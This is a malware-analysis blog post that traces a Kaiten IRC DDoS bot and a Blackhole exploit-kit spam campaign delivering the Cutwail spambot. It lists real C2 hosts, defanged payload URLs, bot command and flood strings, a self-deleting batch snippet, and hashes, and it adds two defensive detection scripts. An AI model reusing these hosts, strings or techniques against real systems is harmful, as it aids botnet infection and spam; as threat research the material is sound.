
Below are the malware functions I gathered:

Uses INET sockets to make outbound connections over IRC, HTTP or FTP.
Locks itself with a PID file (/tmp/tan.pid, via flock) to avoid being started twice.
Forking functionality (commands run in forked children).
Remote-control IRC bot functions like:
 a. Remote FTP access for infecting further
 b. Basic commands: NICK, SERVER, KILL, GET, HELP, IRC, SH
 c. Handlers for IRC numerics like _352 (WHO reply), _376 (end of MOTD), _433 (nick in use) for botnet communication
 d. IMPORTANT! A flooding operation is implemented in the program, with the HTTP header below:
......GET /%s HTTP/1.0\
......Connection: Keep-Alive
......User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
......Host: %s:80\
......Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
......Accept-Encoding: gzip\r\nAccept-Language: en
......Accept-Charset: iso-8859-1,*,utf-8
......(followed by long strings of characters assembled from the IRC command instructions)
Practically, upon starting it tries to connect to IRC at the hosts below:
cvv4you.ru
188.190.124.120
188.190.124.81
It then waits for the boss to connect and order some malicious acts.
All further hacking was done via FTP, and HTTP was used for flooding.
For FTP, it tries to get some stuff from the host below:
Hostname: wf.networksolution.com
Address: 205.178.189.131
↑There should be some bad stuff in there.

Sample! Sample!

Yes, since I know how hard it feels not to be shared samples, I am currently waiting for permission to share some samples for research purposes, so please hold on. Right now we're allowed to scan it on VirusTotal :-) here's the URL >>>Link
Here's the details:

SHA256: 6e4586e5ddf44da412e05543c275e466b9da0faa0cc20ee8a9cb2b2dfd48114e
SHA1: 13aa008b0f3c9e92450979ee52cb46accf49aff3
MD5: 6547b92156b39cb3bb5371b17d2488f2
File size: 18.5 KB ( 18902 bytes )
File name: -bash
File type: ELF
Tags: elf
Detection ratio: 7 / 47
Analysis date: 2013-05-30 11:37:36 UTC ( 4 minutes ago )
F-Secure : Generic.Malware.IFg.985D9435
GData : ELF:Tsunami-L
MicroWorld-eScan : Generic.Malware.IFg.985D9435
Avast : ELF:Tsunami-L [Trj]
Kaspersky : Backdoor.Linux.Tsunami.gen
BitDefender : Generic.Malware.IFg.985D9435
Emsisoft : Generic.Malware.IFg.985D9435 (B)

Additional:

(1) After some research, I found that this malware is known for being compiled by hand on the hacked machine itself. It is well known as Kaiten, a Linux/Unix DDoS IRC bot (thanks to @exitthematrix of KM).
(2) A similar attack was also found on a site with the Ruby on Rails web admin panel vulnerability, posted by Mr. Jeff Jarmoc on his site jarmoc.com; he detected traces of the source code used during compilation of the malware and posted it on his blog here -->>[JARMOC.COM]. After some comparison I found a strong possibility that the same malware code and the same bad actor were behind both cases. Since both findings were made so close in time, I bet there are other servers under attack with a similar pattern and malware, so please check your systems regularly.
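For "check your systems regularly", the strings recovered above (the lock file, the help text, the flood User-Agent, the SH command template) and the SHA-256 published above are enough to sweep the usual drop directories on other servers. The script below is an added example, not a tool from the original post: it hashes every small regular file under the given roots, compares the hash against the known sample, counts which of the bot's strings are present, and also reports any file named with a leading "-". SUSPECT_BLOB and CLEAN_BLOB are constructed stand-ins for files under test, not the real sample.

```python
"""Sweep drop directories for this bot's on-disk artifacts: the known
sample hash plus the strings recovered in the analysis above.  Added
example, not from the original post; SUSPECT_BLOB/CLEAN_BLOB are
constructed test inputs, not the real binary."""
import hashlib
import os

# Strings lifted from the analysis above.  Each alone is weak evidence
# (the User-Agent is a public Kaiten string), two or more together is not.
INDICATORS = [
    b"/tmp/tan.pid",
    b"Lockfile found. Exiting.",
    b"Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)",
    b"NOTICE %s :SH <command> = Executes a command",
    b"NOTICE %s :GET <http address> <save as>",
    b"someone will have to SPOOFS me manually",
    b"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;",
]
# SHA-256 of the "-bash" sample from the VirusTotal details above.
KNOWN_SHA256 = {
    "6e4586e5ddf44da412e05543c275e466b9da0faa0cc20ee8a9cb2b2dfd48114e",
}
MIN_HITS = 2        # flag on two or more distinct indicator strings
DROP_DIRS = ["/tmp", "/var/tmp", "/dev/shm"]


def score_blob(data):
    """Hash and string-match one file's contents."""
    sha = hashlib.sha256(data).hexdigest()
    hits = [s.decode() for s in INDICATORS if s in data]
    known = sha in KNOWN_SHA256
    return {"sha256": sha, "known": known, "hits": hits,
            "suspect": known or len(hits) >= MIN_HITS}


def hunt(roots, max_size=4 * 1024 * 1024):
    """Walk the roots and return [(path, reason, score)] for suspect files.
    Symlinks and files above max_size are skipped (the sample is 18902 bytes)."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    if os.path.islink(path) or os.path.getsize(path) > max_size:
                        continue
                    with open(path, "rb") as fh:
                        data = fh.read()
                except OSError:
                    continue
                score = score_blob(data)
                if score["known"]:
                    findings.append((path, "known sample hash", score))
                elif score["suspect"]:
                    findings.append((path, "indicator strings", score))
                elif name.startswith("-"):
                    findings.append((path, "file name starts with '-'", score))
    return findings


# Constructed inputs: an ELF-looking blob carrying three of the strings,
# and a harmless shell script.
SUSPECT_BLOB = (b"\x7fELF" + b"\0" * 64 + b"/tmp/tan.pid\0Lockfile found. Exiting.\0"
                + b"Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\0")
CLEAN_BLOB = b"#!/bin/sh\necho hello\n"

if __name__ == "__main__":
    for path, reason, score in hunt(DROP_DIRS):
        print(path, reason, score["sha256"], score["hits"])
```

Run it as root so /tmp entries owned by other users are readable, and extend DROP_DIRS with the web root and the cron spool, since the post's intrusion came in through a web panel and a cron entry.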

MalwareMustDie!!

Wednesday, 29 May 2013

Infection Summary:

Recently we're back into full research, going straight for all the junk mail campaigns that spread malware. Today I bumped into a malvertisement spam email that I thought a bit "unusual", as below:
Since some of you might see the same sample, I thought it worth explaining what happened; unexpectedly it led me into a complicated analysis. Believe me, this case is worth digging into further, and what I wrote here is a short version of the overall scheme.

The marked link is a redirection page to the Blackhole landing page at:

h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php
You'll be redirected as below:
h00p://papakarlo24.ru/wp-gdt.php?H00OTWYN3DI3Z4
Resolving papakarlo24.ru... seconds 0.00, 92.38.227.2
Caching papakarlo24.ru => 92.38.227.2
Connecting to papakarlo24.ru|92.38.227.2|:80... seconds 0.00, connected.
:
GET /wp-gdt.php?H00OTWYN3DI3Z4 h00p/1.0
Host: papakarlo24.ru
h00p request sent, awaiting response...
:
h00p/1.1 302 Moved Temporarily
Server: nginx/0.8.55
Date: Wed, 29 May 2013 08:16:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Location: h00p://uninstallingauroras・net/closest/i9jfuhioejskveohnuojfir.php
Content-Length: 0
:
302 Moved Temporarily
Location: h00p://uninstallingauroras・net/closest/i9jfuhioejskveohnuojfir.php [following]
:
h00p://uninstallingauroras・net/closest/i9jfuhioejskveohnuojfir.php
conaddr is: 92.38.227.2
Resolving uninstallingauroras.net... seconds 0.00, 80.78.247.227
Caching uninstallingauroras.net => 80.78.247.227
Which leads the user to the PDF exploit download URLs:
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?yxt=1n:1j:2w:1m:1i&jnhzkr=2v:3g:30&vzk=1k:1f:2w:1m:31:1o:1l:1l:30:31&jitgppkh=1k:1d:1f:1d:1g:1d:1f
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?nvxzelny=1n:1j:2w:1m:1i&msiinq=37&hsbvq=1k:1f:2w:1m:31:1o:1l:1l:30:31&kfkojw=1k:1d:1f:1d:1g:1d:1f
Here's the snapshot of those exploits:
Both PDFs are exploit downloaders for the malware payload at the URL below:
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?orsjgvtp=1n:1j:2w:1m:1i&zxlegtgp=1k:1f:2w:1m:31:1o:1l:1l:30:31&tqdybltx=1h&mryvsc=pcyxjux&sctxbc=liolty
The reputation of IP 80.78.247.227 is bad; VirusTotal passive DNS ((LINK)) reports OTHER landing page URLs/domains in use:
Latest URLs hosted in this IP address detected by at least one 
URL scanner or malicious URL dataset:
4/39 2013-05-29 14:08:16 h00p://notablereward.com/closest/i9jfuhioejskveohnuojfir.php
4/39 2013-05-29 13:07:47 h00p://agefsndac.com/closest/i9jfuhioejskveohnuojfir.php
1/38 2013-05-28 18:17:40 h00p://blockedgerman.com/closest/i9jfuhioejskveohnuojfir.php

Latest malware that are detected by at least one antivirus solution and
were downloaded by VirusTotal from the IP address provided:
2/47 2013-05-29 14:08:24 28134f652bbcfddd156423010bd60c481da541271314872ca4b34645dc8c0830
4/47 2013-05-29 00:20:29 71df67ecbd66dce7c66d30bd32b13ae3f0f1c39d24741538f1543c1f71ee8dd0
Back to our case. Here's the payload:
Sample : ./sample.exe
MD5 : 0d2af51b28138ab79074dedad6c6a00d
SHA256 : 6d41edd7f3964b191d130d16ca8df834874eb4056a7d4287022aa910b3450409
It is on VT already. Looks like we're the second to find this:
SHA256: 6d41edd7f3964b191d130d16ca8df834874eb4056a7d4287022aa910b3450409
SHA1: 5385cc8e975ed8748fe8937853d1eb0f55a34917
MD5: 0d2af51b28138ab79074dedad6c6a00d
File size: 91.5 KB ( 93707 bytes )
File name: sample.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 19 / 47
Analysis date: 2013-05-29 09:09:50 UTC ( 1 hour, 7 minutes ago )
Verdict:
F-Secure                 : Trojan.GenericKDZ.19645
DrWeb : Trojan.DownLoad3.23197
GData : Trojan.GenericKDZ.19645
Symantec : WS.Reputation.1
AhnLab-V3 : Trojan/Win32.Tepfer
McAfee-GW-Edition : PWS-Zbot-FAQD!0D2AF51B2813
TrendMicro-HouseCall : TROJ_GEN.R47H1ES13
MicroWorld-eScan : Trojan.GenericKDZ.19645
Avast : Win32:Dropper-gen [Drp]
Kaspersky : Trojan-Spy.Win32.Zbot.lvxs
BitDefender : Trojan.GenericKDZ.19645
McAfee : PWS-Zbot-FAQD!0D2AF51B2813
Malwarebytes : Backdoor.Bot.ST
Rising : Win32.Asim.a
Panda : Trj/CI.A
Fortinet : W32/Zbot.LVXS!tr
ESET-NOD32 : Win32/Wigon.PH
Emsisoft : Trojan.Win32.Zbot (A)
Comodo : UnclassifiedMalware

How and from where was it sent?


↑You'll see a client spambot tool (or MUA) with the signatures below, the ones usually used to send such malvertisement:

Microsoft SMTP Server id 8.0.685.24;
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9)
Gecko/20100921 Thunderbird/3.1.4
With the relay characteristics below:
Received: from unknown (HELO Spammer/FQDN) (Spammer Used MTA IP/x.x.x.x)
MIME-Version: 1.0
Status: RO
So we see it was relayed (through an open or bypassed relay) via 89.79.81.183; the question is always "how"?

A bit of Exploit Kit & PDF Exploit analysis

It's a Blackhole v2.x, the "/closest/" type. You can't afford to miss when whacking this one: it can be accessed one hit at a time per IP. The "material" needed to grab it is all in the spam email itself, so be sure you know the source of these. Snipped PluginDetect "head" code:
It uses PluginDetect (as always) version 0.7.9, weaponized only for the PDF exploit infection, as coded here:
I used our previously published formula to crack the URLs:
Downloading these PDFs works the same way as accessing the landing page, so be careful with your chances. Shortly and frankly: I decoded the first PDF for the payload URL and ran the second to confirm the link. This is the JS/evil code of the first PDF:
Just run it in a PDF/JS environment to get the eval values. It contains a BoF:
CVE-2009-0927 exploit:

The exploit method varies per Adobe version, selected via plugin detection:
It hits the shellcode, encoded as here (see the decode logic under it):
The shellcode itself is not that special; run the decode part to get the shellcode binary:
The payload URL is at the bottom of it.

For takedown evidence, the response headers logged while downloading the payload:

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 29 May 2013 08:50:05 GMT
Content-Type: application/x-msdownload
Content-Length: 93707
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Wed, 29 May 2013 08:50:10 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
:
200 OK
Length: 93707 (92K) [application/x-msdownload]
Saving to: `sample.exe'
2013-05-29 17:50:10 (45.5 KB/s) - `sample.exe' saved [93707/93707]

What Payload Malware is this?

First, please see the details available on VT, as I will skip those.

The payload registers the autorun entry below:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xoxkycomvoly(RANDOM)
→"C:\Documents and Settings\User\xoxkycomvoly.exe"
And copies itself into:
CopyFileA{
lpExistingFileName: "c:\test\sample.exe",
lpNewFileName: "C:\Documents and Settings\User\xoxkycomvoly.exe", (RANDOM)
bFailIfExists: 0x0 }
The batch file (temporary, deleted afterwards) executed to remove the original:
:repeat
del %s
if exist %s goto :repeat
del %%0
And the sample runs the cascaded SVCHOST processes like below:
Please note the PID of sample2 (the payload) and the two SVCHOSTs.
The payload is in charge of the HTTP remote connection (the botnet purpose):
While both SVCHOSTs connect to HTTP, HTTPS (encrypted) and SMTP (the spambot):

If you squeeze the binary further you'll get the important traces below:

These are the HTTP methods and headers used:

http://%s/?ptrxcz_%s
http://%s/
https://%s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Accept: */*
Accept-Language: en
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: %d
Accept-Encoding: gzip, deflate
gzip
POST
GET
Strings used as flags to report the infected PC's OS version:
IsWow64Process
UndefinedOS
Win8
WinServer2012
Win7
WinServer2008R2
WinServer2008
Vista
WinHomeServer
WinServer2003R2
WinServer2003
WinXP64
WinXP
Win2K
Some targeted SMTP/mail servers:
// SMTP relays used afterwards..

smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
Strings used for spamming purposes (fake sender domains, etc.), faking SMTP traffic (later understood to be a decoy covering the real hidden CnC traffic; see comment):
reactionsearch.com
picsnet.com
mville.edu
oakwood.org
intelnet.net.gt
optonline.net
cox.net
pga.com
rcn.com
vampirefreaks.com
tiscali.co.uk
msu.edu
freenet.de
bluewin.ch
o2.pl
cfl.rr.com
worldnetatt.net
uakron.edu
comcast.net
centrum.cz
axelero.hu
aon.at
oakland.edu
ukr.net
posten.se
talstar.com
cnet.com
emailmsn.com
yahoo.com.hk
vodafone.nl
zoomtown.com
otakumail.com
netsync.net
grar.com
stc.com.sa
col.com
gallatinriver.net
worldonline.co.uk
aruba.it
bluewin.com
zoomnet.net
gcsu.edu
amazon.com
microtek.com
voicestream.com
tellmeimcute.com
bmw.com
backaviation.com
oregonstate.edu
earthlink.net
cablelan.net
floodcity.net
uplink.net
mindspring.com
clarksville.com
dr.com
shmais.com
sexstories.com
cwnet.com
chickensys.com
gravityboard.com
happyhippo.com
midway.edu
oakwood.org
intelnet.net.gt
blackplanet.com
tampabay.rr.com
gmx.net
juno.com
vampirefreaks.com
canada.com
worldnetatt.net
beeone.de
idea.com
boardermail.com
arcor.de
verizonwireless.com
mediom.com
iw.com
passagen.se
iupui.edu
ufl.edu
jwu.edu
uga.edu
music.com
accountant.com
ministryofsound.net
the-beach.net
metallica.com
vodafone.com
zdnetmail.com
hoymail.com
iwon.com
accessus.net
cbunited.com
pchome.com.tw
kazza.com
cytanet.com.cy
frisurf.no
parrotcay.como.bz
willinet.net
claranet.fr
kw.com
caixa.gov.br
frostburg.edu
intuit.com
actuslendlease.com
rowdee.com
vodafone.nl
feton.net
wcsu.edu
ricochet.com
embarqmail.com
allstream.net
mynet.com
kcrr.com
south.net
ig.com.br
atkearney.com
colorado.edu
zoomnet.net
creighton.edu
amazon.com
mvts.com
potamkinmitsubishi.com
lansdownecollege.com
mania.com
marchmail.com
anetsbuys.com
yatroo.com
bassettfurniture.com
machlink.com
nccn.net
floodcity.net
maui.net
earthlink.com
doctor.com
mexico.com
sexstories.com
penn.com
aussiestockforums.com
bendcable.com
ipeg.com
mediom.com
free.fr
ufl.edu
www.aol.com
hotmale.com
cox.com
ministryofsound.net
stargate.net
orange.pl
mzsg.at
imaginet.com
charter.com
pandora.be
iwon.com
windstream.net
oakland.edu
suscom.net
metrocast.net
migente.com
erzt.com
willinet.net
claranet.fr
kw.com
rockford.edu
emailmsn.com
uymail.com
xtra.co.nz
brettlarson.com
badactor.us
stc.com.sa
t-mobel.com
yahoo.com.cn
gatespeed.com
itexas.net
yahoo.com.tw
diamondcpu.com
vail.com
clear.net.nz
gallatinriver.net
ia.telecom.net
idealcollectables.com
number1.net
agilent.com
in.com
windermere.com
mts.net
sscomputing.com
primeline.com
indosat.com
lansdownecollege.com
springsips.com
tellmeimcute.com
chataddict.com
expn.com
earthlink.net
surfglobal.net

Networking Activities

Logged outbound SMTP connections...


// per domain

19:58:16.6989801 -> 65.55.96.11:smtp","SUCCESS"
19:59:03.0738552 -> www2.windstream.net:smtp","SUCCESS"
19:59:03.0739711 -> www.freenet.de:smtp","SUCCESS"
19:59:03.0740055 -> 67-208-33-32.neospire.net:smtp","SUCCESS"
19:59:03.1832375 -> 208.73.210.29:smtp","SUCCESS"
19:59:03.1833775 -> web1.gcsu.edu:smtp","SUCCESS"
19:59:03.1834395 -> searchportal.information.com:smtp","SUCCESS"
19:59:03.1834970 -> 176.32.98.166:smtp","SUCCESS"
19:59:09.0894742 -> www2.windstream.net:smtp","SUCCESS"
19:59:09.0896164 -> www.freenet.de:smtp","SUCCESS"
19:59:09.0896742 -> 67-208-33-32.neospire.net:smtp","SUCCESS"
19:59:09.1988465 -> 208.73.210.29:smtp","SUCCESS"
19:59:09.1989401 -> web1.gcsu.edu:smtp","SUCCESS"
19:59:09.1989982 -> searchportal.information.com:smtp","SUCCESS"
19:59:09.1990529 -> 176.32.98.166:smtp","SUCCESS"
19:59:21.1206896 -> www2.windstream.net:smtp","SUCCESS"
19:59:21.1208310 -> www.freenet.de:smtp","SUCCESS"
19:59:21.1208796 -> 67-208-33-32.neospire.net:smtp","SUCCESS"
19:59:21.2300697 -> 208.73.210.29:smtp","SUCCESS"
19:59:21.2302281 -> web1.gcsu.edu:smtp","SUCCESS"
19:59:21.2302759 -> searchportal.information.com:smtp","SUCCESS"
19:59:21.2303220 -> 176.32.98.166:smtp","SUCCESS"
19:59:33.9175361 -> www.colorado.edu:smtp","SUCCESS"
19:59:39.9331487 -> www.colorado.edu:smtp","SUCCESS"
19:59:47.0425029 -> centurylink.clap1.emerald.synacor.com:smtp","SUCCESS"
19:59:47.0426073 -> web-failover.machlink.com:smtp","SUCCESS"
19:59:47.1518818 -> members.aon.at:smtp","SUCCESS"
19:59:47.3706337 -> 195.214.195.105:smtp","SUCCESS"
19:59:47.3706803 -> static-199-91-125-78.b.awsrdns.net:smtp","SUCCESS"
19:59:47.3707130 -> 190.93.240.36:smtp","SUCCESS"
19:59:50.4331352 -> main13.maui.net:smtp","SUCCESS"
19:59:51.8550218 -> www.colorado.edu:smtp","SUCCESS"
19:59:53.0581188 -> centurylink.clap1.emerald.synacor.com:smtp","SUCCESS"
19:59:53.0582180 -> web-failover.machlink.com:smtp","SUCCESS"
19:59:53.1674956 -> members.aon.at:smtp","SUCCESS"
19:59:53.3862449 -> 195.214.195.105:smtp","SUCCESS"
19:59:53.3863597 -> static-199-91-125-78.b.awsrdns.net:smtp","SUCCESS"
19:59:53.3863929 -> 190.93.240.36:smtp","SUCCESS"
19:59:56.4487419 -> main13.maui.net:smtp","SUCCESS"
20:00:05.0893555 -> centurylink.clap1.emerald.synacor.com:smtp","SUCCESS"
20:00:05.0895655 -> web-failover.machlink.com:smtp","SUCCESS"
20:00:05.1987210 -> members.aon.at:smtp","SUCCESS"
20:00:05.4174687 -> 195.214.195.105:smtp","SUCCESS"
20:00:05.4175715 -> static-199-91-125-78.b.awsrdns.net:smtp","SUCCESS"
20:00:05.4176248 -> 190.93.240.36:smtp","SUCCESS"
20:00:08.4799646 -> main13.maui.net:smtp","SUCCESS"

// per IP address

19:58:16.6989801 -> 65.55.96.11:25","SUCCESS"
19:58:25.7770809 -> 212.227.97.23:443","SUCCESS"
19:59:03.0738552 -> 162.39.145.20:25","SUCCESS"
19:59:03.0739711 -> 62.104.23.42:25","SUCCESS"
19:59:03.0740055 -> 67.208.33.32:25","SUCCESS"
19:59:03.1832375 -> 208.73.210.29:25","SUCCESS"
19:59:03.1833775 -> 168.16.211.93:25","SUCCESS"
19:59:03.1834395 -> 208.73.210.88:25","SUCCESS"
19:59:03.1834970 -> 176.32.98.166:25","SUCCESS"
19:59:09.0894742 -> 162.39.145.20:25","SUCCESS"
19:59:09.0896164 -> 62.104.23.42:25","SUCCESS"
19:59:09.0896742 -> 67.208.33.32:25","SUCCESS"
19:59:09.1988465 -> 208.73.210.29:25","SUCCESS"
19:59:09.1989401 -> 168.16.211.93:25","SUCCESS"
19:59:09.1989982 -> 208.73.210.88:25","SUCCESS"
19:59:09.1990529 -> 176.32.98.166:25","SUCCESS"
19:59:21.1206896 -> 162.39.145.20:25","SUCCESS"
19:59:21.1208310 -> 62.104.23.42:25","SUCCESS"
19:59:21.1208796 -> 67.208.33.32:25","SUCCESS"
19:59:21.2300697 -> 208.73.210.29:25","SUCCESS"
19:59:21.2302281 -> 168.16.211.93:25","SUCCESS"
19:59:21.2302759 -> 208.73.210.88:25","SUCCESS"
19:59:21.2303220 -> 176.32.98.166:25","SUCCESS"
19:59:33.9175361 -> 128.138.129.98:25","SUCCESS"
19:59:39.9331487 -> 128.138.129.98:25","SUCCESS"
19:59:47.0425029 -> 208.47.185.65:25","SUCCESS"
19:59:47.0426073 -> 69.49.95.110:25","SUCCESS"
19:59:47.1518818 -> 195.3.96.72:25","SUCCESS"
19:59:47.3706337 -> 195.214.195.105:25","SUCCESS"
19:59:47.3706803 -> 199.91.125.78:25","SUCCESS"
19:59:47.3707130 -> 190.93.240.36:25","SUCCESS"
19:59:50.4331352 -> 69.174.243.94:25","SUCCESS"
19:59:51.8550218 -> 128.138.129.98:25","SUCCESS"
19:59:53.0581188 -> 208.47.185.65:25","SUCCESS"
19:59:53.0582180 -> 69.49.95.110:25","SUCCESS"
19:59:53.1674956 -> 195.3.96.72:25","SUCCESS"
19:59:53.3862449 -> 195.214.195.105:25","SUCCESS"
19:59:53.3863597 -> 199.91.125.78:25","SUCCESS"
19:59:53.3863929 -> 190.93.240.36:25","SUCCESS"
19:59:56.4487419 -> 69.174.243.94:25","SUCCESS"
20:00:05.0893555 -> 208.47.185.65:25","SUCCESS"
20:00:05.0895655 -> 69.49.95.110:25","SUCCESS"
20:00:05.1987210 -> 195.3.96.72:25","SUCCESS"
20:00:05.4174687 -> 195.214.195.105:25","SUCCESS"
20:00:05.4175715 -> 199.91.125.78:25","SUCCESS"
20:00:05.4176248 -> 190.93.240.36:25","SUCCESS"
20:00:08.4799646 -> 69.174.243.94:25","SUCCESS"

Some HTTP/HTTPS connections...

(1) SSLv2 / https://x.x.x.x (SSL operation for authentication)
(2) HTTP/1.1 - POST http://x.x.x.x
*) This request is answered with the target mail relay information.
But there are also other responses:
↑ these are botnet pokes.

(3) HTTP/1.1 - POST http://x.x.x.x/?ptrxcz_%s
There are very many of these requests↑; I picked one:
See the marked HTML data following the response. It is HTML code; I saved it into test.html below to see the contents:
After you enter the captcha you are redirected into an unlimited possibility of pages... Yes, this is the trojan spambot for sure. It contains the data grabbed via its botnet to spread spam. So now we know for real how they are sent :-)

*) There are also very many 302 (redirection) and 403 (forbidden) responses to the (2) and (3) HTTP requests; I searched for the direct-response cases only (note: please see the PCAP in the sample for your deeper investigation).
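As an added example (not the author's tooling and not part of the original post), the following Python script parses connection-log lines in the format quoted above and pulls out what a responder wants from such a log: how many distinct SMTP peers the host contacted inside a short window (a legitimate server relays through one or two fixed MTAs, whereas a spambot fans out to the MX of every victim domain), how often each peer was retried, and whether an HTTP request line carries the /?ptrxcz_ check-in marker from request (3). The embedded log lines are an excerpt copied from the per-IP log above; the 60-second window, the SMTP port set and the beacon regex are assumptions to tune for your own environment.

```python
"""Spambot fan-out check over connection-log lines in the format quoted above.

Added example, not the post author's tooling. Assumptions: the line format
'<HH:MM:SS.fraction> -> <host-or-ip>:<port>","SUCCESS"' as shown above, the
window length, and the /?ptrxcz_ marker taken from request (3) in the post.
"""
import re
from collections import Counter
from datetime import datetime, timedelta

# One log line: timestamp, arrow, destination:port, then the CSV tail that
# survived extraction ('","SUCCESS"'). The stray quotes are optional.
LINE_RE = re.compile(
    r'^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s*->\s*'
    r'(?P<dst>[^:\s]+):(?P<port>[A-Za-z0-9]+)"?,"?(?P<result>[A-Z]+)"?\s*$'
)

# Destination ports that mean "talking to a mail server", whether the log
# writes the number or the service name (assumed set).
SMTP_PORTS = {"25", "smtp", "465", "smtps", "587", "submission"}

# URI marker of the bot's HTTP check-in, taken from request (3) above.
BEACON_RE = re.compile(r"/\?ptrxcz_")


def parse_line(line):
    """Return (timestamp, dst, port, result) or None if the line doesn't match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    # The log has 7 fractional digits; strptime's %f accepts at most 6.
    ts = datetime.strptime(m["ts"][:15], "%H:%M:%S.%f")
    return ts, m["dst"], m["port"].lower(), m["result"]


def smtp_events(lines):
    """Parsed events whose destination port is an SMTP port, in time order."""
    events = [e for e in map(parse_line, lines) if e is not None and e[2] in SMTP_PORTS]
    return sorted(events, key=lambda e: e[0])


def max_fanout(lines, window_seconds=60):
    """Largest number of distinct SMTP peers contacted inside any window.

    Returns (count, set_of_peers) for the densest window. A relay host talks
    to one or two MTAs; a spambot talks to the MX of every victim domain.
    """
    events = smtp_events(lines)
    window = timedelta(seconds=window_seconds)
    best, best_peers = 0, set()
    for i, (start, _, _, _) in enumerate(events):
        peers = {dst for ts, dst, _, _ in events[i:] if ts <= start + window}
        if len(peers) > best:
            best, best_peers = len(peers), peers
    return best, best_peers


def retries(lines):
    """Connections per SMTP peer; the log above hits the same peers again seconds apart."""
    return Counter(dst for _, dst, _, _ in smtp_events(lines))


def is_beacon(request_line):
    """True when an HTTP request line carries the /?ptrxcz_ check-in marker."""
    return BEACON_RE.search(request_line) is not None


# Excerpt of the per-IP log quoted above (copied from the post, not invented).
SAMPLE_LOG = [
    '19:58:16.6989801 -> 65.55.96.11:25","SUCCESS"',
    '19:58:25.7770809 -> 212.227.97.23:443","SUCCESS"',
    '19:59:03.0738552 -> 162.39.145.20:25","SUCCESS"',
    '19:59:03.0739711 -> 62.104.23.42:25","SUCCESS"',
    '19:59:03.0740055 -> 67.208.33.32:25","SUCCESS"',
    '19:59:03.1832375 -> 208.73.210.29:25","SUCCESS"',
    '19:59:03.1833775 -> 168.16.211.93:25","SUCCESS"',
    '19:59:03.1834395 -> 208.73.210.88:25","SUCCESS"',
    '19:59:03.1834970 -> 176.32.98.166:25","SUCCESS"',
    '19:59:09.0894742 -> 162.39.145.20:25","SUCCESS"',
    '19:59:09.0896164 -> 62.104.23.42:25","SUCCESS"',
    '19:59:33.9175361 -> 128.138.129.98:25","SUCCESS"',
    '19:59:47.0425029 -> 208.47.185.65:25","SUCCESS"',
]

if __name__ == "__main__":
    count, peers = max_fanout(SAMPLE_LOG)
    print(f"{count} distinct SMTP peers within 60 s: {sorted(peers)}")
    for dst, n in retries(SAMPLE_LOG).most_common(3):
        print(f"{dst}: {n} connections")
    # Constructed request line carrying the marker from request (3) above.
    print(is_beacon("POST /?ptrxcz_AbCd HTTP/1.1"))
```

On the excerpt the densest 60-second window already holds nine distinct mail servers, and the 443 connection is correctly left out of the SMTP count; the same functions run unchanged on the per-domain form of the log because the regex accepts a service name in the port position.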

Samples

For research/education purposes and to raise detection rates of the infection components (not only the payload), I am sharing samples as per the data below (click the picture to download):

Epilogue

We can't be sure what this malvertisement would like to infect us with. Since the first access in the pre-infection stage is itself a redirection to the "closest" version of the Blackhole Exploit Kit (the payload can be changed at any time by those morons), the post-infection stage is the botnet-based communication by the payload. So please note that what I posted is not static and the conditions can change.

Many AV verdicts state PWS or Zbot, but to be frank I didn't see much evidence to support that; instead, the spambot function we found leads to MANY bad things driven by its botnet, and we also found some TDS and phishing backends. So I won't treat this threat as second priority, as the botnet access volume itself is outstanding. Again, this case is worth digging into and monitoring further.

This is the series of the PayPal, eFAX and Chase malvertisements that I recently tweeted. The similar relay pattern and SMTP signatures of some samples positively confirmed this verdict, like one of the samples below (I picked the eFAX one):

I wrote some pastes during analysis (the paste's LINK is here -->>here); mostly these are PWS/Fareit (credential stealer) trojans (except this one). Since now we know for sure how these messes are sent, I bet we'll see more of these campaigns for a while. We can guess that the same greedy bad actors are behind this; let's collect together every piece of evidence needed to nail them.

[Additional / Fri May 31 16:48:24 JST 2013] Thanks to @EP_X0FF of KM for confirming the right malware name: this sample is confirmed as the Win32/Cutwail spambot trojan. For your convenience the decrypted sample by @EP_X0FF can be downloaded here -->>[KernelMode]. You can see that our previous analysis, made on binary traces, was correct by comparing it with his decrypted sample. In addition, the memory forensics data lists the domains targeted. The VT check shows: (Link -->>HERE)

SHA256: 5f8fcc9c56bf959041b28e97bfb5db9659b20a6e6076cfba8cb2d591184c9164
SHA1: 95b3d8fe4ae65faa7f1bf66f56f067862ddceec2
MD5: 0c699bf8815137404fc43f6e56761ac8
File size: 45.5 KB ( 46560 bytes )
File name: MEMORY.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 29 / 47
Analysis date: 2013-05-31 04:44:49 UTC ( 2 hours, 58 minutes ago )

MicroWorld-eScan : Generic.Malware.SFBdld.738AD202
McAfee : Trojan-FBGJ!0C699BF88151
K7AntiVirus : Riskware
K7GW : Trojan
F-Prot : W32/Injector.A.gen!Eldorado
Norman : Malware
ByteHero : Virus.Win32.Heur.c
TrendMicro-HouseCall : Mal_DLDER
Avast : Win32:DNSChanger-ZZ [Trj]
